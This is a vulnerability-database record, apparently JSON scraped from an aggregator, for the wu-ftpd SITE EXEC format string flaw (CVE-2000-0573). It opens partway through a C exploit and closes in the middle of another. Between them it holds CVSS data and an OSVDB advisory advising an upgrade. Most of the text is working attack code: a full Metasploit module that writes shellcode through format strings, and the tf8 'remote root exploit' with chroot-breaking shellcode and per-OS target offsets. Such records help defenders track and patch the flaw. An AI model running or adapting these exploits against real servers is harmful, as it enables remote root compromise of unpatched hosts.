n=read(STDIN_FILENO,recvbuf,1024);\r\n if (n>0)\r\n {\r\n recvbuf[n]=0;\r\n write(sock,recvbuf,n);\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\nint\r\nconn2host(char *host, int port)\r\n{\r\nint \t\tsockfd; \r\nstruct \t\thostent *he;\r\nstruct \t\tsockaddr_in their_addr; \r\n\r\n if ((he=gethostbyname(host)) == NULL)\r\n\t{ \r\n herror(\"gethostbyname\");\r\n exit(1);\r\n\t}\r\n if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t{\r\n perror(\"socket\");\r\n exit(1);\r\n\t}\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(port); \r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n bzero(&(their_addr.sin_zero), 8); \r\n\r\n if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)\r\n\t{\r\n perror(\"connect\");\r\n exit(1);\r\n\t}\r\n \r\n return(sockfd);\r\n\r\n}\r\n\r\nvoid\r\nlogin(void)\r\n{\r\nchar\t\t*user = \"USER anonymous\\n\";\r\nchar\t\t*pass = \"PASS guest@\\n\";\r\nchar\t\trbuf[1024];\r\n\r\n send(sock, user, strlen(user), 0);\r\n recv(sock, rbuf, 1024, 0);\r\n memset(rbuf, 0, 1024);\r\n send(sock, pass, strlen(pass), 0);\r\n while(strstr(rbuf, \"login ok\") == NULL)\r\n\t{\r\n\t memset(rbuf, 0, 1024);\r\n\t recv(sock, rbuf, 1024, 0);\r\n\t}\r\n\r\n}\r\n\r\nvoid\r\nusage(char *progname)\r\n{\r\nint\t\ti = 0;\r\n \r\n printf(\"Usage: %s [options]\\n\", progname);\r\n printf(\"Options:\\n\"\r\n\t \" -h hostname\\n\"\r\n\t \" -t target\\n\"\r\n\t \" -o offset\\n\"\r\n\t \"Available targets:\\n\");\r\n while(target[i].def != 69)\r\n\t{ \r\n printf(\" %d) %s\\n\", target[i].def, target[i].descr);\r\n i++;\r\n\t} \r\n\r\n exit(1);\r\n\r\n}\r\n\r\n\r\n// milw0rm.com [2001-05-08]\r\n", "osvdbidlist": ["11805"]}
{"cve": [{"lastseen": "2020-10-03T11:36:56", "description": "The lreply function in wu-ftpd 2.6.0 and earlier does not properly cleanse an untrusted format string, which allows remote attackers to execute arbitrary commands via the SITE EXEC command.", "edition": 3, "cvss3": {}, "published": "2000-07-07T04:00:00", "title": "CVE-2000-0573", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0573"], "modified": "2018-05-03T01:29:00", "cpe": ["cpe:/o:hp:hp-ux:11.00"], "id": "CVE-2000-0573", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0573", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:16:06", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Wu-ftpd SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84534", "href": "https://packetstormsecurity.com/files/84534/Wu-ftpd-SITE-EXEC-INDEX-Format-String-Vulnerability.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. 
\n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::FormatString \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'wu-ftpd SITE EXEC/INDEX Format String Vulnerability', \n'Description' => %q{ \nThis module exploits a format string vulnerability in versions of the \nWashington University FTP server older than 2.6.1. By executing \nspecially crafted SITE EXEC or SITE INDEX commands containing format \nspecifiers, an attacker can corrupt memory and execute arbitrary code. \n}, \n'Author' => \n[ \n'jduck' \n], \n'References' => \n[ \n['OSVDB', '11805'], \n['CVE', '2000-0573'], \n['BID', '1387'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'PrependChrootBreak' => true \n}, \n'Privileged' => true, \n'Payload' => \n{ \n# format string max length \n'Space' => 256, \n# NOTE: \\xff's need to be doubled (per ftp/telnet stuff) \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\", \n'DisableNops' => 'True', \n'StackAdjustment' => -1500 \n}, \n'Platform' => [ 'linux' ], \n'Targets' => \n[ \n# \n# Automatic targeting via fingerprinting \n# \n[ 'Automatic Targeting', { 'auto' => true } ], \n \n# \n# specific targets \n# \n[ 'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)', \n{ \n'UseDPA' => false, \n'PadBytes' => 3, \n'NumPops' => 8, \n'AddrPops' => 100, \n'Offset' => -2088, # offset to stack return \n'Writable' => 0xbfffde26, # stack, avoid badchars \n'FlowHook' => -1, # auto now... 
0xbffff1e4 # stack return addr \n} \n], \n# these aren't exploitable (using built-in, stripped down vsprintf, no %n) \n#[ 'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)', \n#[ 'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)', \n#[ 'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)', \n[ 'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)', \n{ \n'UseDPA' => true, \n'PadBytes' => 2, \n'NumPops' => 276, \n'AddrPops' => 2, \n'Offset' => -17664, # offset to stack return \n'Writable' => 0x806e726, # bss \n#'Writable' => 0xbfff0126, # stack, avoid badchars \n'FlowHook' => -1, # auto now... 0xbfffb028 # stack return addr \n#'FlowHook' => 0x806e1e0 # GOT of sprintf \n} \n], \n \n# \n# this one will detect the parameters automagicly \n# \n[ 'Debug', \n{ \n'UseDPA' => false, \n'PadBytes' => 0, \n'NumPops' => 0, \n'AddrPops' => -1, \n'Offset' => -1, \n'Writable' => 0x41414242, # \n'FlowHook' => 0x43434545 # \n} \n], \n], \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(21), \n], self.class ) \nend \n \n \ndef check \nconnect_login \nprint_status(\"FTP Banner: #{banner.strip}\") \nstatus = Exploit::CheckCode::Safe \nif banner =~ /Version wu-2\\.(4|5)/ \nstatus = Exploit::CheckCode::Appears \nelsif banner =~ /Version wu-2\\.6\\.0/ \nstatus = Exploit::CheckCode::Appears \nend \n \n# NOTE: vulnerable and exploitable might not mean the same thing here :) \nif not fmtstr_detect_vulnerable \nstatus = Exploit::CheckCode::Safe \nend \nif not fmtstr_detect_exploitable \nstatus = Exploit::CheckCode::Safe \nend \ndisconnect \nreturn status \nend \n \n \ndef exploit \n \nconnect_login \n \n# Use a copy of the target \nmytarget = target \n \nif (target['auto']) \nmytarget = nil \n \nprint_status(\"Automatically detecting the target...\") \nif (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then \nprint_status(\"FTP Banner: #{banner.strip}\") \nversion = m[1] \nelse \nprint_status(\"No 
matching target\") \nreturn \nend \n \nregexp = Regexp.escape(version) \nself.targets.each do |t| \nif (t.name =~ /#{regexp}/) then \nmytarget = t \nbreak \nend \nend \n \nif (not mytarget) \nprint_status(\"No matching target\") \nreturn \nend \n \nprint_status(\"Selected Target: #{mytarget.name}\") \nelse \nprint_status(\"Trying target #{mytarget.name}...\") \nif banner \nprint_status(\"FTP Banner: #{banner.strip}\") \nend \nend \n \n# proceed with chosen target... \n \n# detect stuff! \nif mytarget.name == \"Debug\" \n#fmtstr_set_caps(true, true) \n# dump the stack, so we can detect stuff magically \nprint_status(\"Dumping the stack...\") \nstack = Array.new \nextra = \"aaaabbbb\" \n1000.times do |x| \ndw = fmtstr_stack_read(x+1, extra) \nbreak if not dw \nstack << dw \nend \n \nstack_data = stack.pack('V*') \nprint_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data)) \n \n# detect the number of pad bytes \nidx = stack_data.index(\"aaaabbbb\") \nif not idx \nprint_status(\"Whoa, didn't find the static bytes on the stack!\") \nreturn \nend \nnum_pad = 0 \nnum_pad = 4 - (idx % 4) if (idx % 4) \nmytarget.opts['PadBytes'] = num_pad \n \n# calculate the number of pops needed to hit our addr \nnum_pops = (idx + num_pad) / 4 \nmytarget.opts['NumPops'] = num_pops \nelse \nnum_pad = mytarget['PadBytes'] \nnum_pops = mytarget['NumPops'] \nsc_loc = mytarget['Writable'] \nret = mytarget['FlowHook'] \nend \n \nprint_status(\"Number of pad bytes: #{num_pad}\") \nprint_status(\"Number of pops: #{num_pops}\") \n \n# debugging -> don't try it! 
\nreturn if mytarget.name == \"Debug\" \n#print_status(\"ATTACH!\") \n#sleep(5) \n \nfmtstr_detect_caps \n \n# compute the stack return address using the fmt to leak memory \naddr_pops = mytarget['AddrPops'] \noffset = mytarget['Offset'] \nif addr_pops > 0 \nstackaddr = fmtstr_stack_read(addr_pops) \nprint_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops]) \nret = stackaddr + offset \nend \n \nprint_status(\"Writing shellcode to: %#x\" % sc_loc) \nprint_status(\"Hijacking control via %#x\" % ret) \n \n \n# no extra bytes before the padding.. \nnum_start = 0 \n \n# write shellcode to 'writable' \narr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget) \n \n# process it in groups of 24 (max ~400 bytes per command) \nsc_num = 1 \nwhile arr.length > 0 \nprint_status(\"Sending part #{sc_num} of the payload...\") \nsc_num += 1 \n \nnarr = arr.slice!(0..24) \n \nfmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget) \n# a space allows the next part to start with a '/' \nfmtbuf[num_pad-1,1] = \" \" \nfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\") \nif ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true))) \nif res[0,4] == \"500 \" \nthrow \"Crap! 
Something went wrong when uploading the payload...\" \nend \nend \nend \n \n \n# write 'writable' addr to flowhook (execute shellcode) \n# NOTE: the resulting two writes must be done at the same time \nprint_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret]) \n \nfmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget) \n# a space allows the next part to start with a '/' \nfmtbuf[num_pad-1,1] = \" \" \nfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\") \n# don't wait for the response here :) \nres = send_cmd(['SITE', 'EXEC', fmtbuf], false) \n \nprint_status(\"Your payload should have executed now...\") \nhandler \nend \n \n \n# \n# these two functions are used to read stack memory \n# (used by fmtstr_stack_read() \n# \ndef trigger_fmt(fmtstr) \nreturn nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2)) \nsend_cmd(['SITE', 'EXEC', 'x', fmtstr], true) \nend \n \ndef extract_fmt_output(res) \nif res[0,4] == \"500 \" \n#throw \"Crap! Something went wrong while dumping the stack...\" \nreturn nil \nend \nret = res.strip.split(/\\r?\\n/)[0] \nret = ret[6,ret.length] \nreturn ret \nend \n \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84534/wuftpd_site_exec_format.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2000-0573"], "edition": 1, "description": "## Vulnerability Description\nWU-FTPD contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered due to a format string error in the site_exec() function. By sending a specially crafted argument to the SITE EXEC command, a remote attacker could potentially execute arbitrary code.\n## Solution Description\nUpgrade to version 2.6.1 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## Short Description\nWU-FTPD contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered due to a format string error in the site_exec() function. By sending a specially crafted argument to the SITE EXEC command, a remote attacker could potentially execute arbitrary code.\n## References:\nVendor URL: http://www.wu-ftpd.org/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2000/20000623)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2000-039.html)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2000-06/0233.html)\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2000-010.txt.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2000-020.0.txt)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/freebsd/2000-07/0039.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/suse_security_announce_53.txt)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20000701-01-I)\nSnort Signature ID: 1971\n[Nessus Plugin ID:10452](https://vulners.com/search?query=pluginID:10452)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-06/0225.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-07/0093.html\nISS X-Force ID: 4773\nGeneric Exploit URL: http://www.securityfocus.com/archive/1/66367\n[CVE-2000-0573](https://vulners.com/cve/CVE-2000-0573)\nCIAC Advisory: k-054\nCERT VU: 29823\nCERT: CA-2000-13\nBugtraq ID: 1387\n", "modified": "2000-06-22T00:00:00", "published": "2000-06-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11805", "id": "OSVDB:11805", "title": "WU-FTPD site_exec() Function Remote Format String", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], 
"exploitdb": [{"lastseen": "2016-02-02T13:19:11", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (1). CVE-2000-0573. Remote exploit for unix platform", "published": "1999-10-15T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "1999-10-15T00:00:00", "id": "EDB-ID:20030", "href": "https://www.exploit-db.com/exploits/20030/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n\r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n\r\nIt should be noted that the SITE INDEX command is affected as well. \r\n\r\n/*\r\n * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 
15-10-1999\r\n *\r\n * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT\r\n * by tf8\r\n *\r\n * *NOTE*: For ethical reasons, only an exploit for 2.6.0 will be\r\n * released (2.6.0 is the most popular version nowadays), and it\r\n * should suffice to proof this vulnerability concept.\r\n *\r\n * Site exec was never really *fixed*\r\n *\r\n * Greetz to portal (he is elite!#%$) and all #!security.is, glitch, DiGit,\r\n * \\x90, venglin, xz, MYT and lamagra.\r\n * Also greetings go to the WU-FTPD development team for including this\r\n * bug in ALL their versions.\r\n *\r\n * Fuck to wuuru (he is an idiot)\r\n *\r\n * Account is not required, anonymous access is enough :)\r\n *\r\n * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <signal.h>\r\n#include <errno.h>\r\n\r\n#ifdef __linux\r\n#include <getopt.h>\r\n#endif\r\n\r\n#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)\r\n#define GREEN \"\\033[32m\"\r\n#define RED \"\\033[31m\"\r\n#define NORM \"\\033[0m\"\r\n\r\nchar infin_loop[]= /* for testing purposes */\r\n \"\\xEB\\xFE\";\r\n\r\nchar bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */\r\n \"\\x31\\xc0\\x50\\x50\\x50\\xb0\\x7e\\xcd\\x80\\x31\\xdb\\x31\\xc0\\x43\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\xb0\\x5a\\xcd\\x80\\xeb\\x77\\x5e\\x31\\xc0\"\r\n \"\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\x68\\xff\\xff\\x01\\x53\\x53\\xb0\"\r\n \"\\x88\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\x53\\x53\\xb0\\x3d\\xcd\\x80\"\r\n \"\\x31\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\"\r\n \"\\x31\\xc0\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\"\r\n \"\\xf1\\x31\\xc0\\x88\\x46\\x09\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x3d\\xcd\"\r\n 
\"\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\"\r\n \"\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\"\r\n \"\\x0c\\x52\\x51\\x53\\x53\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x53\"\r\n \"\\x53\\xb0\\x01\\xcd\\x80\\xe8\\x84\\xff\\xff\\xff\\xff\\xff\\xff\\x30\"\r\n \"\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\"\r\n \"\\x67\\x6c\\x69\\x6e\";\r\n\r\nchar bsd_code_d[]= /* you should call it directly (no jump/call)*/\r\n \"\\xEB\\xFE\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5C\"\r\n \"\\x8B\\x74\\x24\\xFC\\x31\\xC9\\xB1\\x15\\x01\\xCE\\xB1\\x71\\xB0\\xEF\"\r\n \"\\x30\\x06\\x8D\\x76\\x01\\xE2\\xF9\\xDE\\x26\\xDE\\x2F\\xBE\\x5F\\xF8\"\r\n \"\\xBF\\x22\\x6F\\x5F\\xB5\\xEB\\xB4\\xBE\\xBF\\x22\\x6F\\x62\\xB9\\x14\"\r\n \"\\x87\\x75\\xED\\xEF\\xEF\\xBD\\x5F\\x67\\xBF\\x22\\x6F\\x62\\xB9\\x11\"\r\n \"\\xBE\\xBD\\x5F\\xEA\\xBF\\x22\\x6F\\x66\\x2C\\x62\\xB9\\x14\\xBD\\x5F\"\r\n \"\\xD2\\xBF\\x22\\x6F\\xBC\\x5F\\xE2\\xBF\\x22\\x6F\\x5C\\x11\\x62\\xB9\"\r\n \"\\x12\\x5F\\xE3\\xBD\\xBF\\x22\\x6F\\x11\\x24\\x9A\\x1C\\x62\\xB9\\x11\"\r\n \"\\xBD\\x5F\\xD2\\xBF\\x22\\x6F\\x62\\x99\\x12\\x66\\xA1\\xEB\\x62\\xB9\"\r\n \"\\x17\\x66\\xF9\\xB9\\xB9\\xBD\\x5F\\xD4\\xBF\\x22\\x6F\\xC0\\x8D\\x86\"\r\n \"\\x81\\xC0\\x9C\\x87\\xEF\\xC1\\xC1\\xEF\";\r\n\r\nchar linuxcode[]= /* Lam3rZ chroot() code */\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n \"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n \"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\xff\\x01\\xb0\\x27\"\r\n \"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\"\r\n \"\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\"\r\n \"\\x5e\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\"\r\n \"\\x09\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\"\r\n 
\"\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\"\r\n \"\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\";\r\n\r\n#define MAX_FAILED 4\r\n#define MAX_MAGIC 100\r\nstatic int magic[MAX_MAGIC],magic_d[MAX_MAGIC];\r\nstatic char *magic_str=NULL;\r\nint before_len=0;\r\nchar *target=NULL,*username=\"ftp\",*password=NULL;\r\nstruct targets getit;\r\n\r\nstruct targets {\r\n int def;\r\n char *os_descr, *shellcode;\r\n int delay;\r\n u_long pass_addr, addr_ret_addr;\r\n int magic[MAX_MAGIC], magic_d[MAX_MAGIC],islinux;\r\n};\r\n\r\nstruct targets targ[]={\r\n {1,\"RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"SuSe 6.3 with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"SuSe 6.4 with wuftpd 2.6.0(1) from rpm\",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},1},\r\n {0,\"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)\",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},1},\r\n {0,\"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports\",bsdcode,10,0x80bb474-100, 0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1\r\n,2,1,2,1,4},0},\r\n {0,\"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages\",bsdcode,2,0x806d5b0-500,0xbfbfc6bc, {0x84,1,2,1,2}, {1,3,2,1,4},\r\n0},\r\n {0,\"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports\",bsdcode,2,0x80a4dec-400,0xbfbfc624,{0x3B,2,1,0xe,0x40,1,2,1,2},{1,\r\n2,1,2,1,3,2,1,4},0},\r\n {0,\"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages\",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},0},\r\n {0,NULL,NULL,0,0,0,{0},{0},0}\r\n};\r\n\r\nvoid usage(char*zu,int 
q){\r\nint i, n, padding;\r\nfprintf(stderr,\"Usage: %s -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]\\n\"\r\n\" [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]\\n\"\r\n\"target : host with any wuftpd\\nuser : anonymous user\\n\"\r\n\"dir : if not anonymous user, you need to have writable directory\\n\"\r\n\"magic_str : magic string (see exploit description)\\n-g : enables magic string digging\\n\"\r\n\"-x : enables test mode\\npass_addr : pointer to setproctitle argument\\n\"\r\n\"ret_addr : this is pointer to shellcode\\nsystypes: \\n\",zu);\r\n for(i=0;targ[i].os_descr!=NULL;i++){\r\n padding=0;\r\n fprintf(stderr,\"%s%2d - %s\\n\",targ[i].def?\"*\":\" \",i,targ[i].os_descr);\r\n if(q>1){\r\n fprintf(stderr,\" Magic ID: [\");\r\n for(n=0;targ[i].magic[n]!=0;n++){\r\n if(targ[i].magic_d[n]==4)\r\n padding=targ[i].magic[n];\r\n fprintf(stderr,\"%02X,%02X\",targ[i].magic[n],targ[i].magic_d[n]);\r\n if(targ[i].magic[n+1]!=0)\r\n fprintf(stderr,\":\");\r\n }\r\n fprintf(stderr,\"] Padding: %d\\n\",padding);\r\n fflush(stderr);\r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\nint connect_to_server(char*host){\r\n struct hostent *hp;\r\n struct sockaddr_in cl;\r\n int sock; \r\n \r\n if(host==NULL||*host==(char)0){\r\n fprintf(stderr,\"Invalid hostname\\n\");\r\n exit(1);\r\n }\r\n if((cl.sin_addr.s_addr=inet_addr(host))==-1) {\r\n if((hp=gethostbyname(host))==NULL) {\r\n fprintf(stderr,\"Cannot resolve %s\\n\",host);\r\n exit(1);\r\n }\r\n memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr));\r\n }\r\n if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){\r\n fprintf(stderr,\"Error creating socket: %s\\n\",strerror(errno));\r\n exit(1);\r\n }\r\n cl.sin_family=PF_INET;\r\n cl.sin_port=htons(21);\r\n if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1){\r\n fprintf(stderr,\"Cannot connect to %s: %s\\n\",host,strerror(errno));\r\n exit(1);\r\n }\r\n return sock;\r\n}\r\n\r\nint ftp_recv(int sock,char*buf,int buf_size,int 
disc){\r\n int n=0;\r\n char q;\r\n \r\n if(disc) while((n=recv(sock,&q,1,0))==1&&q!='\\n');\r\n else {\r\n (void)bzero(buf,buf_size);\r\n n=recv(sock,buf,buf_size,0);\r\n if(n<0){\r\n fprintf(stderr,\"ftp_recv: recv failed\\n\");\r\n exit(1);\r\n }\r\n buf[n]=0;\r\n }\r\n return n;\r\n}\r\nint ftp_send(int sock,char*what,int size,int f,char*ans,int ans_size){\r\n int n;\r\n n=send(sock,what,size,0);\r\n if(n!=size){\r\n fprintf(stderr,\"ftp_send: failed to send. expected %d, sent %d\\n\", size,n);\r\n shutdown(sock,2);\r\n close(sock);\r\n exit(1);\r\n }\r\n if(f)\r\n return ftp_recv(sock,ans,ans_size,0);\r\n return 0;\r\n}\r\n\r\nint ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_len){\r\n ftp_send(sock,buff,buff_len,q,ans,ans_len);\r\n if(strncmp(ans,\"200-\",4)==0)\r\n ftp_recv(sock,NULL,0,1);\r\n else\r\n ftp_recv(sock,ans,ans_len,0);\r\n \r\n if(strncmp(ans,\"200-\",4)){\r\n fprintf(stderr,\"Cannot find site exec response string\\n\");\r\n exit(1);\r\n }\r\n return 0;\r\n}\r\n\r\nvoid ftp_login(int sock,char*u_name,char*u_pass)\r\n{\r\n char buff[2048];\r\n printf(\"loggin into system..\\n\");\r\n snprintf(buff,2047,\"USER %s\\r\\n\", u_name);\r\n ftp_send(sock, buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"USER %s\\n\"NORM\"%s\",u_name,buff);\r\n snprintf(buff,2047,\"PASS %s\\r\\n\",u_pass);\r\n printf(GREEN\"PASS %s\\n\"NORM,*u_pass=='\\x90'?\"<shellcode>\":u_pass);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n while(strstr(buff,\"230 \")==NULL){\r\n (void)bzero(buff,2048);\r\n ftp_recv(sock,buff,2048,0);\r\n }\r\n printf(\"%s\",buff);\r\n return;\r\n}\r\n\r\nvoid ftp_mkchdir(int sock,char*cd,char*new)\r\n{\r\n char buff[2048];\r\n\r\n sprintf(buff,\"CWD %s\\r\\n\",cd);\r\n printf(GREEN\"%s\"NORM,buff);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(\"%s\",buff);\r\n sprintf(buff,\"MKD %s\\r\\n\",new);\r\n ftp_send(sock,buff,strlen(buff),1,buff,2047);\r\n printf(GREEN\"MKD <shellcode>\"NORM\"\\n%s\",buff);\r\n 
